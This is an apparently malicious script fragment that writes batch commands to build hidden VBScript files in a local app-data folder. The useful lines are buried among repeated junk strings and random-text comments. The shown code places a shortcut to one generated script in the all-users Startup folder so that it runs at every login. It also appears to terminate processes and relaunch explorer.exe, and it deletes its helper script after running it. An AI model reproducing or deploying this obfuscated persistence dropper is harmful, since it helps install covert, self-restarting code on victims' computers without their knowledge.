R9cs39N4.WriteLine("echo 'Vyy6PGpxSIZ1iNJX3ybzmkfbwZf17Sn7avNwq5aN36sqU8gF7ptVKLAaN0x1rs9s4Pe27prtIEQ1iNWZMe7rJN6o9ua01b3z2qRch8C4v6XOcP88lqV0SMRK26trbSo4eEsk6Tgn5DFShUw5xkIWjQwMt4qVwdvT3zLI3Hhi6MR9AWYdOxlTcVkSbU4XUUm0GyrwfRyboO1ig578DA >> %LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs");

R9cs39N4.WriteLine('echo gQ0GVRiRzf6e0.Terminate(1)>> "%LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs"');

R9cs39N4.WriteLine("echo 'Vyy6PGpxSIZ1iNJX3ybzmkfbwZf17Sn7avNwq5aN36sqU8gF7ptVKLAaN0x1rs9s4Pe27prtIEQ1iNWZMe7rJN6o9ua01b3z2qRch8C4v6XOcP88lqV0SMRK26trbSo4eEsk6Tgn5DFShUw5xkIWjQwMt4qVwdvT3zLI3Hhi6MR9AWYdOxlTcVkSbU4XUUm0GyrwfRyboO1ig578DA >> %LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs");

R9cs39N4.WriteLine("::kA6GPpIIl0Vf9GX6rhw6zfGqmyY2Zp2GQf606VMRVPCzyMxkX5zNUAsv84g01EwHNRRHWxRzig290an68IWkHaGu4786Xf8jtU1cF0bvY0jh61W5JutH8QwIFUl0uZ1Ulrq0tOL8z3t9TZbuqV0DH6Ki4SRbxG9W492hC7p689QU5XBVMAxhPvhCUDEo70kxK2VzboSohsnOMS658EG7gbXK8v4b9vh4mFjrwv1o9UdpU2xq0vbJ2IR04t550r45i6WFHi3xGaOf9sh4BMs21lGWYV0XBM4DEzGi8eR9Cs8qG2LYBvCbL0sz3qac8Cw1f6WyEc13qOY65W0vJInRmAwen04sp00Tn0i0xE2KerF7oMVpYS198inJHj619Jj4bYbIfbgVT3ebEya7aJ9MY9BXs5GTUkq9BXDB18Q22s9Ha9OKMr9VZj0R5vRIK2kgee8gLCo102bOXzZ4qTdCH6d3Yg9CqYl7Hp04hJ69hy8qErC678CE57ebWQLHSKzfnnfXqoetRM2HSD2GqHytY20bv92hkF0ju4ohYDuv615Qt1HzfvluuIRMh11d11CkjvbXIW2s2m6td7K7lS4V51l7bcW6HGAE85bXvkZ75ZipMZFtnS80KH4Z87tmAo4H29t82Am5erZvYaqn2011VJgbs5Gw1iib5EbcgH9lSa18pPLTGmD6Mb28TJNTJTMKZ562bqGnIiHlB9xQzK0bYX3BBoTC12l058a3sW5ThVs6YFoU80jkyzZmAqNV4YNeP2F7e96lwTZy73m67tqbwe9v342AqR63Y653E1V0ObQRcpkylW5Q87kn5p04cqXtVL07Lb7t48w6Xbsgy8m6dm2p8fEHK2RtLYOWjSTGiu71ruGokj7uW7q5N869QwVhu5a1yT5AlJbZ1mKaa8sApD8Nw8e2TN8R5gISQ783wL76Kd6w7u7nNz3ij5Ew7YHh0ZQyYE170Wl6dy4JPd3a1rhmnK9CaehHSZBW6PyGVT01gVzCc");



R9cs39N4.WriteLine("echo 'Vyy6PGpxSIZ1iNJX3ybzmkfbwZf17Sn7avNwq5aN36sqU8gF7ptVKLAaN0x1rs9s4Pe27prtIEQ1iNWZMe7rJN6o9ua01b3z2qRch8C4v6XOcP88lqV0SMRK26trbSo4eEsk6Tgn5DFShUw5xkIWjQwMt4qVwdvT3zLI3Hhi6MR9AWYdOxlTcVkSbU4XUUm0GyrwfRyboO1ig578DA >> %LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs");

R9cs39N4.WriteLine("echo 'Vyy6PGpxSIZ1iNJX3ybzmkfbwZf17Sn7avNwq5aN36sqU8gF7ptVKLAaN0x1rs9s4Pe27prtIEQ1iNWZMe7rJN6o9ua01b3z2qRch8C4v6XOcP88lqV0SMRK26trbSo4eEsk6Tgn5DFShUw5xkIWjQwMt4qVwdvT3zLI3Hhi6MR9AWYdOxlTcVkSbU4XUUm0GyrwfRyboO1ig578DA >> %LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs");


R9cs39N4.WriteLine('echo Next>> "%LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs"');


R9cs39N4.WriteLine("echo 'Vyy6PGpxSIZ1iNJX3ybzmkfbwZf17Sn7avNwq5aN36sqU8gF7ptVKLAaN0x1rs9s4Pe27prtIEQ1iNWZMe7rJN6o9ua01b3z2qRch8C4v6XOcP88lqV0SMRK26trbSo4eEsk6Tgn5DFShUw5xkIWjQwMt4qVwdvT3zLI3Hhi6MR9AWYdOxlTcVkSbU4XUUm0GyrwfRyboO1ig578DA >> %LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs");


R9cs39N4.WriteLine("echo 'Vyy6PGpxSIZ1iNJX3ybzmkfbwZf17Sn7avNwq5aN36sqU8gF7ptVKLAaN0x1rs9s4Pe27prtIEQ1iNWZMe7rJN6o9ua01b3z2qRch8C4v6XOcP88lqV0SMRK26trbSo4eEsk6Tgn5DFShUw5xkIWjQwMt4qVwdvT3zLI3Hhi6MR9AWYdOxlTcVkSbU4XUUm0GyrwfRyboO1ig578DA >> %LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs");


R9cs39N4.WriteLine("echo 'Vyy6PGpxSIZ1iNJX3ybzmkfbwZf17Sn7avNwq5aN36sqU8gF7ptVKLAaN0x1rs9s4Pe27prtIEQ1iNWZMe7rJN6o9ua01b3z2qRch8C4v6XOcP88lqV0SMRK26trbSo4eEsk6Tgn5DFShUw5xkIWjQwMt4qVwdvT3zLI3Hhi6MR9AWYdOxlTcVkSbU4XUUm0GyrwfRyboO1ig578DA >> %LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs");

R9cs39N4.WriteLine("echo 'Vyy6PGpxSIZ1iNJX3ybzmkfbwZf17Sn7avNwq5aN36sqU8gF7ptVKLAaN0x1rs9s4Pe27prtIEQ1iNWZMe7rJN6o9ua01b3z2qRch8C4v6XOcP88lqV0SMRK26trbSo4eEsk6Tgn5DFShUw5xkIWjQwMt4qVwdvT3zLI3Hhi6MR9AWYdOxlTcVkSbU4XUUm0GyrwfRyboO1ig578DA >> %LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs");


R9cs39N4.WriteLine("::hfIOaw0n92VYEtD74p7a1NBD0dzBrP0eDzyiSbBswn8Gqfz5n2dNmYxWuUE0QVCthTr8EuF2U9B3ZhoquA2UQzP8qcs7Ql1YEXFv7Ui2npdEp5L6rvqUtl25FUBNizoo6r8kjCk7dwAlW72gPf1ZKJItZzQAX9nVQaRzjJ7kpjasX201njm29Fib6K6NH0Vg8Q5RMS7mdjBROfmuL5d98Snd2a00h2GqOb0mBHzgBEsfft97BNfbws8tBI1xSpu7DnBTJTRJ6UH54LVR694l8GnkU9AM4Q34wq8l89QMW2pJGLTrlL9hkRzzgrTsK87YKQp67ooh8zb62bBIbtkZ6UYKRYheiw11lI9UV660W60Gf8ILCfk8l8rhIgLmXTa7B2ifbB24f9N8EGN7abSZMIHQjS311nn8CpQ4Khh4OhDN0NA270AO6G7BGtYl4od1K8wP8h7P7l9ygwoy2cDM2GmloEosgRG2Q4Ee3in53TqJrZqk5GhXHDkU23bb2077EnA4Z87ek19i4MpydWIQBjR3m4exIvauOct41LhAF2szV4133uuv2x56yZFeoCc6D205g3cH8mZzjD6qp87E3Q6L");


R9cs39N4.WriteLine("echo 'Vyy6PGpxSIZ1iNJX3ybzmkfbwZf17Sn7avNwq5aN36sqU8gF7ptVKLAaN0x1rs9s4Pe27prtIEQ1iNWZMe7rJN6o9ua01b3z2qRch8C4v6XOcP88lqV0SMRK26trbSo4eEsk6Tgn5DFShUw5xkIWjQwMt4qVwdvT3zLI3Hhi6MR9AWYdOxlTcVkSbU4XUUm0GyrwfRyboO1ig578DA >> %LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs");

R9cs39N4.WriteLine('echo xTsNBe0z1.Run "explorer.exe">> "%LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs"');

R9cs39N4.WriteLine("echo 'Vyy6PGpxSIZ1iNJX3ybzmkfbwZf17Sn7avNwq5aN36sqU8gF7ptVKLAaN0x1rs9s4Pe27prtIEQ1iNWZMe7rJN6o9ua01b3z2qRch8C4v6XOcP88lqV0SMRK26trbSo4eEsk6Tgn5DFShUw5xkIWjQwMt4qVwdvT3zLI3Hhi6MR9AWYdOxlTcVkSbU4XUUm0GyrwfRyboO1ig578DA >> %LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs");

R9cs39N4.WriteLine("::ECXdJ2Zs0PdNNOB9H5T18WiHh6VYWLG35anj8ZdI6pfxDsEJvofKvNH1qgTYgCzEgOgh57Gv251UunAWE19v0S9rvBLr7xHR9Dn1UzJu053LxBt7s0tkLYVpLQ4YVOJdNrwwiZOxyK9CwCz410EGbNnLctV7TAaK1wj2QnZMOrY00Va74I2f1n5i9fThy50ELHstPrTpwFo12B5EqO3v80jlNYVvl9L6Sim31UU1LY4ZkfhRa0epI8GL5f3I4E8sSgpjrEYSF0WS316u6SSFRKIY1uwOL1Ys1ld65zuTqzeeuR8gFztP84z1bm68rcPU2duz485m6UkpVtM0h3HxDE52Nf3X6fa9tA2IY85zbTVoGuL6G2kYA8XM003F7rkwvRjYm7bxcJw31qVy8nV781k24pF8O54r9l0TtyGqU894a4D81z1PeBIVV58scL4SH");

R9cs39N4.WriteLine("echo 'Vyy6PGpxSIZ1iNJX3ybzmkfbwZf17Sn7avNwq5aN36sqU8gF7ptVKLAaN0x1rs9s4Pe27prtIEQ1iNWZMe7rJN6o9ua01b3z2qRch8C4v6XOcP88lqV0SMRK26trbSo4eEsk6Tgn5DFShUw5xkIWjQwMt4qVwdvT3zLI3Hhi6MR9AWYdOxlTcVkSbU4XUUm0GyrwfRyboO1ig578DA >> %LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs");

R9cs39N4.WriteLine('echo Set xTsNBe0z1 = Nothing>> "%LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs"');


R9cs39N4.WriteLine("echo 'Vyy6PGpxSIZ1iNJX3ybzmkfbwZf17Sn7avNwq5aN36sqU8gF7ptVKLAaN0x1rs9s4Pe27prtIEQ1iNWZMe7rJN6o9ua01b3z2qRch8C4v6XOcP88lqV0SMRK26trbSo4eEsk6Tgn5DFShUw5xkIWjQwMt4qVwdvT3zLI3Hhi6MR9AWYdOxlTcVkSbU4XUUm0GyrwfRyboO1ig578DA >> %LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs");

R9cs39N4.WriteLine("::G6HS2JRkQ5LctFS91hWgrUa3OGVxHYaMCcvVs5D7jRv6H78K8lwV3MO0A5SLakp1tX4by4qncgFaQA2ZyIL9A0aKZWp1HDSQhdLX2baDa4Yv37X4SB0czjNXW8VP9Mp0o9vX8e1R5XMCMxkEXZ374vZxKYmxTt5LO268g2pD5VJyc6Wtl1aerbBmVpikFpbY2L9woN3kwWmUPvQsxZS5Oz8O402FDUV7HJqX64OT08aaGJZEbFFZM8h7W08383F98vyv26X4kn96s2wtPmavv68rKAVrA5vSRSYYNl7I293cVjRSnMM26AXBGYDlnjU4CDEcVe6g42xDo28yGGbtxSzYEemjMwlXm4U2CPu9d3q1f53zB6rvM0Odntycm9JIB7uUjAEfNI2XhdQUAB0JZFF5FQOgIayH119Mz7I2pcYJ97Zwnb6VKC90");

R9cs39N4.WriteLine("echo 'Vyy6PGpxSIZ1iNJX3ybzmkfbwZf17Sn7avNwq5aN36sqU8gF7ptVKLAaN0x1rs9s4Pe27prtIEQ1iNWZMe7rJN6o9ua01b3z2qRch8C4v6XOcP88lqV0SMRK26trbSo4eEsk6Tgn5DFShUw5xkIWjQwMt4qVwdvT3zLI3Hhi6MR9AWYdOxlTcVkSbU4XUUm0GyrwfRyboO1ig578DA >> %LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs");


R9cs39N4.WriteLine('echo Wscript.exit>> "%LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs"');

R9cs39N4.WriteLine("echo 'Vyy6PGpxSIZ1iNJX3ybzmkfbwZf17Sn7avNwq5aN36sqU8gF7ptVKLAaN0x1rs9s4Pe27prtIEQ1iNWZMe7rJN6o9ua01b3z2qRch8C4v6XOcP88lqV0SMRK26trbSo4eEsk6Tgn5DFShUw5xkIWjQwMt4qVwdvT3zLI3Hhi6MR9AWYdOxlTcVkSbU4XUUm0GyrwfRyboO1ig578DA >> %LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs");


R9cs39N4.WriteLine("::C29b9P7L7K0XA949NVBLMU895jYcV5XTE66auhf0uDW80zP2MSJ1uSxFZhRtCxe619aCIcBQZx48MoZIp3l67u5F6kHxtpI81P07YjhTDzTnqCfMHv8Uv9az3iT1Qkutbcv5cHcQEVeA1cMs5oMO7oCs19sObCn4xu1N9GOD2K5BsegNqPSeD6RFM62bbd0Eu3LqE49q9o3g8q5du7eoT10C9TG35cX48Z0x5TuCrkN");


R9cs39N4.WriteLine('echo set So309D2GXyWt65iW8WL = WScript.CreateObject("WScript.Shell") > "%LOCALAPPDATA%\\Temps\\yQoN9p28y.vbs"');

R9cs39N4.WriteLine("::V8QiZ4ZStscu7CwKsf31r0a0kVhOgmT8G68dCn51Y9Qe0s0VdIvIWDtlC2gV4Na5jNmehYW9AsPrw18k998hV4Y627BGrh29sJc8ROKn6Jiy5GmP35Z50dQ05HRaSOev1Yqli49tQZ2DqZc2DzT01Na98K56Le1yTDJesCQ2OY6jq7FArs8k4h6bT79Dur0e3iOocq0ZT3dZzr0RYxbaNPWOCQNnEo27C0fmrTmdYwkuQk1lCHChvss6bpBN4in1ONl9butdIM6Hwo7ky9Mb0kJ7Mwa096X3DL6F3vzN028QeaYOy2hD3VLGwrfi2nlks0D7WfrfaNE6xszfRv76hWCHRK7e4p2mZU49TC98Z2SWhLTSUblynChsF0WHrRC50AM71FPsdpZCerWAy09vMFUdYXY36XT8X4bNH3FtBxto0tM618Jn6H1aNYIUPWzU8VSU3742ofG0ICLyQBll7IFUL1TvjI4uY2OmDe4hRFpysENVq4gq8jGTwMwEKO5y3f8502pw69iGtON2A2X3dMC1u2m8p3FzRqhXD5OK8HFff67D4kT0Xq0aSnQMwfYh22GtP7TIBrkH5LQ5hC0vOh1Iy3UKJa6V4fZJKkf6w3WSB10bhCfo8ze9oOxm6y64oUvN8Bh3bOo1jh13myuO3B7MEkW14TqlyLXSrNoJj872Ef7Qx40wFXOFWLeDEdvqag8OZ3oVs8i3jws2Gkg3nsrm6X67RH892FaOUOo40hCKTSlsEZ40O5F6hrVdThUGI9e0cMLOBLT7RiW8o8klYw8SIAF7dJE4Ts7lXTPQR67o6uEGWI1KM58Y0UnlBUa30sOcJQTN95ePPt2457geTT0r8k5D5zTqVu4bAXRJvB6L56qWTD2J3nhMltl3dEOhJsdeI3WO25CBP160XkfLAPQ2EOgK1V3Lmvse9XMhMfLc4q66JL9EYehzw1iFT9A8Q2gkhQsFvx2f26yM1CQVR7XaB74yo09D683RKqx556B3Q1Im39026W95863Q0sBtVeE85wXZqYMPF5gbosPZBwMCoYHI5u18qd853d2K8Ls2h3usrBw1b0WXuIqM8Y3mYcg9GS2o4Ry4X5lUUU2ig241zeyj7WfMPyT63eKz51qgXtTOJHLt6oqtGMX0eVnNZn61oi1DW2LVoTbN5wlfVrA4jQgtgIUg020ZhzpJh695RRwzd93pko5OJKsjvtHvwTg0ho6G43u0Lqi5dDvzbkq");

R9cs39N4.WriteLine("echo 'Vyy6PGpxSIZ1iNJX3ybzmkfbwZf17Sn7avNwq5aN36sqU8gF7ptVKLAaN0x1rs9s4Pe27prtIEQ1iNWZMe7rJN6o9ua01b3z2qRch8C4v6XOcP88lqV0SMRK26trbSo4eEsk6Tgn5DFShUw5xkIWjQwMt4qVwdvT3zLI3Hhi6MR9AWYdOxlTcVkSbU4XUUm0GyrwfRyboO1ig578DA >> %LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs");


R9cs39N4.WriteLine('echo ErAO7tz49 = "%ALLUSERSPROFILE%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\n9y7zrblxW3.lnk" >> "%LOCALAPPDATA%\\Temps\\yQoN9p28y.vbs"');

R9cs39N4.WriteLine("::K255570RNNI6QU12qn3d1XLLanpK6EEYNbKSd37Wz9MP2t0L2r84znuDtHHYFtRQt45TJRP2RETArNytir92sL4Ir2RejD27kyrOigk5LJ57CFZ50CW65BT50GaQrY4ABzR1ROl7I6hQo9Nyoc4S2c89pClzP4XouvURKZNvNA1X2nt6npe8rk985hJMu7PXwxKAu0LqBL4WdceHFZwSO1cdrpIz70w1Z35XkINqcOI367rUwWIuHdItql67Zhl7C905w1vy4In0Is8PyRhIr2I6NHcdxLe8pLn44AVpxE9ToFr1yjH81VqatfQFh4D0JFhR4Oc7HFv4tOt4iYRH3Qb9rZ5by88kKzIvF59sCy1UOE397a7A30nlv31baTbn0xT6zDkum9vWWwssNbpXcoo1oUZ66sJ0k0miC6t460qR3cM6YSZG064bueav3Bm9bU9y30So76rsoDvO951Al03YMK09B7xEXsnmNUKS6j7Q8D735BDn6UXvoE46fcoQb632S7P3emSSS2iEeOda7QmGKxbSF8zIbGSCbAadV1MLMh0Y9X8cQ92K28R4aajtx0c0m6vn28z1sgSi6IfCkpSC8tuypGZsyTnU9uu8nv0THU3v5ojfF99ZQE54IMj");

R9cs39N4.WriteLine("echo 'Vyy6PGpxSIZ1iNJX3ybzmkfbwZf17Sn7avNwq5aN36sqU8gF7ptVKLAaN0x1rs9s4Pe27prtIEQ1iNWZMe7rJN6o9ua01b3z2qRch8C4v6XOcP88lqV0SMRK26trbSo4eEsk6Tgn5DFShUw5xkIWjQwMt4qVwdvT3zLI3Hhi6MR9AWYdOxlTcVkSbU4XUUm0GyrwfRyboO1ig578DA >> %LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs");

R9cs39N4.WriteLine("echo 'Vyy6PGpxSIZ1iNJX3ybzmkfbwZf17Sn7avNwq5aN36sqU8gF7ptVKLAaN0x1rs9s4Pe27prtIEQ1iNWZMe7rJN6o9ua01b3z2qRch8C4v6XOcP88lqV0SMRK26trbSo4eEsk6Tgn5DFShUw5xkIWjQwMt4qVwdvT3zLI3Hhi6MR9AWYdOxlTcVkSbU4XUUm0GyrwfRyboO1ig578DA >> %LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs");

R9cs39N4.WriteLine('echo set QQgIu3CAWkdYJ2X5 = So309D2GXyWt65iW8WL.CreateShortcut(ErAO7tz49) >> "%LOCALAPPDATA%\\Temps\\yQoN9p28y.vbs"');

R9cs39N4.WriteLine("echo 'Vyy6PGpxSIZ1iNJX3ybzmkfbwZf17Sn7avNwq5aN36sqU8gF7ptVKLAaN0x1rs9s4Pe27prtIEQ1iNWZMe7rJN6o9ua01b3z2qRch8C4v6XOcP88lqV0SMRK26trbSo4eEsk6Tgn5DFShUw5xkIWjQwMt4qVwdvT3zLI3Hhi6MR9AWYdOxlTcVkSbU4XUUm0GyrwfRyboO1ig578DA >> %LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs");
R9cs39N4.WriteLine("::eek:oxaithF3hbe9U5q5Sf5My4kx7JqK669w2yxCJECIW13Iz9DPCFepB2n23E64ocWNDY4075A8Uld86yqJj4kV86Kqr69PLp97q1EBDe2C0W2pwIeKzTRQ6ttC4MjJ6AhyJ049wos8hiv3IY3cH5s04o0zmVbF5ilowXuGZHh8ZmaE6o6c8VpsZwijZY8dQ823VNyfyt1IYzhQ1SWCLd");

R9cs39N4.WriteLine('echo QQgIu3CAWkdYJ2X5.TargetPath = "%LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs" >> "%LOCALAPPDATA%\\Temps\\yQoN9p28y.vbs"');

R9cs39N4.WriteLine("echo 'Vyy6PGpxSIZ1iNJX3ybzmkfbwZf17Sn7avNwq5aN36sqU8gF7ptVKLAaN0x1rs9s4Pe27prtIEQ1iNWZMe7rJN6o9ua01b3z2qRch8C4v6XOcP88lqV0SMRK26trbSo4eEsk6Tgn5DFShUw5xkIWjQwMt4qVwdvT3zLI3Hhi6MR9AWYdOxlTcVkSbU4XUUm0GyrwfRyboO1ig578DA >> %LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs");

R9cs39N4.WriteLine("::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");

R9cs39N4.WriteLine('echo QQgIu3CAWkdYJ2X5.Save >> "%LOCALAPPDATA%\\Temps\\yQoN9p28y.vbs"');
R9cs39N4.WriteLine("::q531oZ5oWSb5V9OxZC6OE67M0njgq7ox4A22Up6vO02ZTp9q9OTu1rnTn2rAbjm9NUVtYx3CugoNv8580fFwSccQ7NBkuP1Dkb7Le9E5si512yw2yrCfZ4UVCrKYwiDVVj2RUfcq26xvtnGqdPfWGrvIQ0HHijKVQ44mNOp9yJsPe20hR1w4ucwgRN1aBKGp3L3JhAP2qz8h7E36BSQ0w9cvjDICh965xOiS0FOLb3Czvt8lTlN08X6e99BIc1q8dZfU9tNfP5fnhV4LJFHnl0Rzk1OkZiSrvB3XBzzRaMh9913vwGprteDaTn6N2Q50jpDsCCDQ51n04jonx8JbBDU01xjKGtp3OPWbnT9I22vNf7ls4K3JraAj6oaHOrR7MVv8U55OTZ5pMhn9mDVkLnzd6V0tUg4CopMizg19mL8D2w5N09ww7KOVYLUOd1nMmAnsIAnrlscO3q9vD4ulK3ju6E3KDfRtKqgbcz1gCPx486eEsY26F0DVu945o2rPIjnliB52plrJerEK29rAM7F0w4uPTtKk37z1fgREaY3vl3J38SFUbc1U0G8nZg2Agmz8LFJYjcIvonhA8hEAE688jv4sIQUzMy7k8V4iZDjp8vLEmSm6IC6wBNE5TXzu6ruYN4Ijv1UK2r11LqStI5ykwpr7P3T2e1tRLq1aGDkO72po405rc4ZcBw7jGS5e7en260205f5Zxn4s1F72nOF95wYme1UeGOnnm5451uMX4w35ufyam5DVih0J3Sve5grv7LWoa54K4TKpLxgOwodYgg3c3fyxcMHqUZsrc073x6zQy5SO17aC1Fc0mfTS7jirY08V1r1YpqaIOT54ACj5Cx8CYll9g10fvAP3AE8m37Pgp9j6W2z7Q8xzJgKf7bDx5KGArzwucK50mbaBQ0NVBd57B6Fw5oyV8c56s32Ykaq07n3NwZBR27k1iq0JjmY35OsCyyrQWs21WgdxE4sOy61zv8HaR1XVoRKwbseDa7B7Xf7uoOQ5vD7cC1r6bVq6qAwg8nFr8h9D5waDj6moS84MTTI7a0m39PjpdTDzc0AlSwgc30hV7709nU3lLQ65XIfH8gFMlB64RWlFR6t098e377XLOWjD09G3c9qSwSh6Pl2A9F9j2r62myGbaOaal8f3zBWFQHG1dVVhuc9trUTMsbDVJ91A0Sm2MH11icKW");

R9cs39N4.WriteLine("echo 'Vyy6PGpxSIZ1iNJX3ybzmkfbwZf17Sn7avNwq5aN36sqU8gF7ptVKLAaN0x1rs9s4Pe27prtIEQ1iNWZMe7rJN6o9ua01b3z2qRch8C4v6XOcP88lqV0SMRK26trbSo4eEsk6Tgn5DFShUw5xkIWjQwMt4qVwdvT3zLI3Hhi6MR9AWYdOxlTcVkSbU4XUUm0GyrwfRyboO1ig578DA >> %LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs");


R9cs39N4.WriteLine('cscript "%LOCALAPPDATA%\\Temps\\yQoN9p28y.vbs"');

R9cs39N4.WriteLine("::fZcNt9bPb16rgs6Rsj4951Yk4Obqed7Ca1knZmnXK5aKzfVJ1qGsT3sqWHl8IPDE3aNMdDtV4UhOJuD1Nt4rQb3tkXN2iBnaMDBSjjKg5R7v7ycizb6DbMMEceo2Sa6242xvtuHpIAxbeEB1g97xZU2KqDmJP4Y8bPWArde3hNgEkJi3pqrJ59W74RS6L1tvtEuIs5KUft85cG0w01Kv9ssPWlRPJ4MMr608PMjRqCVYAqANPzW6XNYy2DoG4EvOLv9dGY7M1l8HG9y6c0BozdqrYecfYiD5JLaCplWnC6M34a9Q26BWyfjqU8w1nw486cgDYv647QTDFxTm8CK9mVPA4J3lZX52ntBdVw66xKe97taDPOVyxSK1DO6kpn8T9ZeX6k9UaRroWWi6ax12Qpclo401vTxNum23svozoW2cnpsbDjmSlzS87mqDlmVfv5nJ05a3VYlv7n2tO8cCAB8O4fLW1yvE8vIoJ9UrgRST8ca6I0Kjw5LNFc22I0KrUQgn0V84dFCh4iDxS82S5ec4gp9F2LicDzYw2k13aaG4bzHU38Vt1SIaSQP1G2Ln6FAdvXywD3RB0ji0V84mX9jQV1f5Kz");

R9cs39N4.WriteLine('DEL "%LOCALAPPDATA%\\Temps\\yQoN9p28y.vbs"');

